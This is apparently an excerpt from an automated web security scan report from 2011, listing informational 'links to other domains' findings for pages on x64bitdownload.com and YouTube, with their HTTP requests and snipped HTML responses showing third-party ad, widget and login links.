<script type='text/javascript' src='http://static.fmpub.net/site/thisnext'></script>
...[SNIP]...

20.712. http://www.x64bitdownload.com/contact.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/contact.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.x64bitdownload.com/contact.html?subject=Advertising+inquiry

The response contains the following links to other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js
http://s7.addthis.com/static/btn/lg-bookmark-en.gif
http://s7.addthis.com/static/btn/lg-rss-en.gif
http://www.addthis.com/bookmark.php
http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=
http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen
http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg

Request

GET /contact.html?subject=Advertising+inquiry HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
           <a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-bookmark-en.gif" width="125" height="16" border="0" alt="64-bit download" style="vertical-align:middle;"/></a>

           
            |  <a href="http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=" title="Subscribe using any feed reader!" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-rss-en.gif" width="125" height="16" border="0" alt="Latest 64-bit downloads RSS" style="vertical-align:middle;"/></a>
...[SNIP]...
<p style="padding-bottom:10px;">
                       <a href="http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen" rel="nofollow" target="_blank" class="link01">
                           <img src="http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg" width="120" height="165" alt="FREE driver update scan!" border="0"/><br/>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

20.713. http://www.x64bitdownload.com/software-advanced.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/software-advanced.html

Issue detail

The page was loaded from a URL containing a query string:

http://www.x64bitdownload.com/software-advanced.html?subcategory_id=44&category_id=3&s=d

The response contains the following links to other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js
http://s7.addthis.com/js/152/addthis_widget.js
http://s7.addthis.com/static/btn/lg-bookmark-en.gif
http://s7.addthis.com/static/btn/lg-rss-en.gif
http://www.addthis.com/bookmark.php
http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=
http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen
http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg

Request

GET /software-advanced.html?subcategory_id=44&category_id=3&s=d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</script>
           <a href="http://www.addthis.com/bookmark.php" onmouseover="return addthis_open(this, '', '[URL]', '[TITLE]')" onmouseout="addthis_close()" onclick="return addthis_sendto()" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-bookmark-en.gif" width="125" height="16" border="0" alt="64-bit download" style="vertical-align:middle;"/></a>

           
            |  <a href="http://www.addthis.com/feed.php?pub=kicko&h1=http%3A%2F%2Fwww.x64bitdownload.com%2Frss%2Fdownloads.xml&t1=" title="Subscribe using any feed reader!" rel="nofollow"><img src="http://s7.addthis.com/static/btn/lg-rss-en.gif" width="125" height="16" border="0" alt="Latest 64-bit downloads RSS" style="vertical-align:middle;"/></a>
...[SNIP]...
<p style="padding-bottom:10px;">
                       <a href="http://www.liutilities.com/affcb/?id=DSgen&aff=2736&xat=gen" rel="nofollow" target="_blank" class="link01">
                           <img src="http://www.liutilities.com/partners/affiliate/affiliateCentre/assets/graphics/ds-en/box_120x165.jpg" width="120" height="165" alt="FREE driver update scan!" border="0"/><br/>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_overlay.js" async defer charset="utf-8"></script>
...[SNIP]...

20.714. http://www.youtube.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.youtube.com/?hl=en&tab=w1

The response contains the following links to other domains:

http://ad-g.doubleclick.net/adi/com.ythome/_default;sz=970x250,960x250;klg=en;kt=K;kga=-1;kgg=-1;kcr=us;dc_dedup=1;kmyd=ad_creative_1;tile=1;dcopt=ist;ord=5111726023253930?
http://code.google.com/apis/youtube/overview.html
http://s.ytimg.com/yt/cssbin/www-core-vfl1C7jty.css
http://s.ytimg.com/yt/favicon-vflZlzSbU.ico
http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif
http://s.ytimg.com/yt/jsbin/www-core-vflzXR69y.js
http://www.google.com/support/youtube/bin/request.py?contact_type=abuse&hl=en_US
http://www.google.com/support/youtube/bin/static.py?p=homepage&page=start.cs&hl=en_US
http://www.google.com/tools/feedback/intl/en/error.html
http://youtube-global.blogspot.com/
http://youtube-global.blogspot.com/2010/10/1-billion-subscriptions-and-counting.html
https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F%253Fhl%253Den%2526tab%253Dw1&ltmpl=sso&service=youtube&hl=en_US
https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F&ltmpl=sso&service=youtube&hl=en_US
https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US
https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&hl=en_US&ltmpl=sso
https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso

Request

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 16:01:43 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Thu, 21-Jan-2021 16:01:43 GMT
Set-Cookie: GEO=930f412dd946c393c719c45b1db7c824cwsAAAAzVVOtwdbzTT2iZw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >

<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...
</title>

<link id="www-core-css" rel="stylesheet" href="http://s.ytimg.com/yt/cssbin/www-core-vfl1C7jty.css">

<style type="text/css">
...[SNIP]...
<link rel="search" type="application/opensearchdescription+xml" href="http://www.youtube.com/opensearch?locale=en_US" title="YouTube Video Search">
<link rel="icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="shortcut icon" href="//s.ytimg.com/yt/favicon-vflZlzSbU.ico" type="image/x-icon">
<link rel="canonical" href="/">
...[SNIP]...
</script>

<script id="www-core-js" src="//s.ytimg.com/yt/jsbin/www-core-vflzXR69y.js"></script>
...[SNIP]...
<a href="/" title="YouTube home">
<img id="logo" class="master-sprite" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="YouTube home">
</a>
...[SNIP]...
</a>

<a class="start" href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F%253Fhl%253Den%2526tab%253Dw1&ltmpl=sso&service=youtube&hl=en_US">Create Account</a><a class="end" href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F%253Fhl%253Den%2526tab%253Dw1&hl=en_US&ltmpl=sso">Sign In</a>
...[SNIP]...
</span>
<img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" class="master-sprite">
</a>
...[SNIP]...
<div id="ad_creative_1" class="ad-div mastad" style="z-index: 1;">
<iframe id="ad_creative_iframe_1" src="http://ad-g.doubleclick.net/adi/com.ythome/_default;sz=970x250,960x250;klg=en;kt=K;kga=-1;kgg=-1;kcr=us;dc_dedup=1;kmyd=ad_creative_1;tile=1;dcopt=ist;ord=5111726023253930?" height="250" width="970" scrolling="no" frameborder="0" style="z-index: 1" id="homepagetop" onload="yt.www.home.ads.workaroundLoad()" onmouseover="yt.www.home.ads.workaroundIE(this)" onfocus="yt.www.home.ads.workaroundIE(this)"></iframe>
...[SNIP]...
</span>
<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso">Sign In</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('REC')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="REC-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="REC-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
ointer; display:inline; float: right;" onclick="_hidediv('logged_out_rec_learn_more_box'); return false;" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/Rec_LearnMore_Close');"><img class="img-php-close-button master-sprite" style="background-position: -82px -712px;" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div style="color: black; padding-left: 5px; padding-right: 10px; margin-top: 10px;">
Remember, you will get better, more specific, and more consistent recommendations by <a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso">logging in</a> (or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account%3Fnext%3D%252F&ltmpl=sso&service=youtube&hl=en_US">signing up</a>
...[SNIP]...
<div class="opt-box-top">
<img class="homepage-sprite img-php-opt-box-caret" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" />
</div>
...[SNIP]...
<div class="opt-close opt-close-button" onclick="moduleHelper.closeOptionsPane('TOP')"><img class="img-php-close-button" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif"/></div>
...[SNIP]...
<div id="TOP-loading-icn" class="opt-loading-icn" style="display: none;">
<img width="16" id="TOP-loading-icn-image" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" image="//s.ytimg.com/yt/img/icn_loading_animated-vflff1Mjj.gif">
</div>
...[SNIP]...
<div class="opt-simple-msg">
Want to customize this homepage?

<a href="https://www.google.com/accounts/ServiceLogin?uilel=3&service=youtube&passive=true&continue=http%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26nomobiletemp%3D1%26hl%3Den_US%26next%3D%252F&hl=en_US&ltmpl=sso" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignIn/EditModuleBox');">Sign In</a> or <a href="https://www.google.com/accounts/LogoutWarning?continue=http%3A%2F%2Fwww.youtube.com%2Fcreate_account&ltmpl=sso&service=youtube&hl=en_US" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/LoginSuggest/SignUp/EditModuleBox');">Sign Up</a>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="World of... Wait, What? No Really? Fondling 3D - 1/22/11" data-thumb="//i3.ytimg.com/vi/B7TICfqeck0/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/24');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title=""Pretty Eyes" - Alex Goot" data-thumb="//i3.ytimg.com/vi/bxpiK1RqRHY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/10');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Incendie Imagix Mons" data-thumb="//i2.ytimg.com/vi/aJQPPwjPwNE/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/25');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Russisch f..r Anf..nger" data-thumb="//i1.ytimg.com/vi/tbfQLn8Mmf0/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/1');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Kevin Muscat red card against Melbourne Heart" data-thumb="//i4.ytimg.com/vi/3gV6rVB0JmE/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/17');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Beach Waves: How to Scrunch Hair" data-thumb="//i2.ytimg.com/vi/IzXWIf-RGVk/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/26');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Fred Gets Kidnapped by Claudio" data-thumb="//i1.ytimg.com/vi/tVaZHc4RLuY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/23');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="More Gigabytes - Kanye West - All of the Lights (Official Music Video) PARODY" data-thumb="//i1.ytimg.com/vi/HgeDfXcEZwY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/15');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title="Kevin Muscat red card against Melbourne Heart" data-thumb="//i4.ytimg.com/vi/3gV6rVB0JmE/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmp');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" title=""Pretty Eyes" - Alex Goot" data-thumb="//i3.ytimg.com/vi/bxpiK1RqRHY/default.jpg" alt="Thumbnail" class="" onmousedown="yt.analytics.urchinTracker('/Events/Home/PersonalizedHome/TOP/Logged_Out/0%26s%3Dmf');" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/HHu-xaE7xL0/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i4.ytimg.com/vi/K6BiXBBbp2s/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/hszZmFRPqx8/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i1.ytimg.com/vi/0UjsXo9l6I8/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/fA8fMUdmvkA/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
button" class="end yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-menu-id="shared-addto-menu" data-button-action="" role="button" aria-pressed="false"> <img class="yt-uix-button-arrow" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""></button>
...[SNIP]...
<span class="clip"><img src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt="Thumbnail" data-thumb="//i3.ytimg.com/vi/V84pW9AN6Og/default.jpg" ></span>
...[SNIP]...
ype="button" class="master-sprite start yt-uix-button yt-uix-button-short yt-uix-tooltip" onclick=";return false;" title="" data-button-action="yt.www.addtomenu.add" role="button" aria-pressed="false"><img class="yt-uix-button-icon-addto" src="//s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif" alt=""> <span class="yt-uix-button-content">
...[SNIP]...
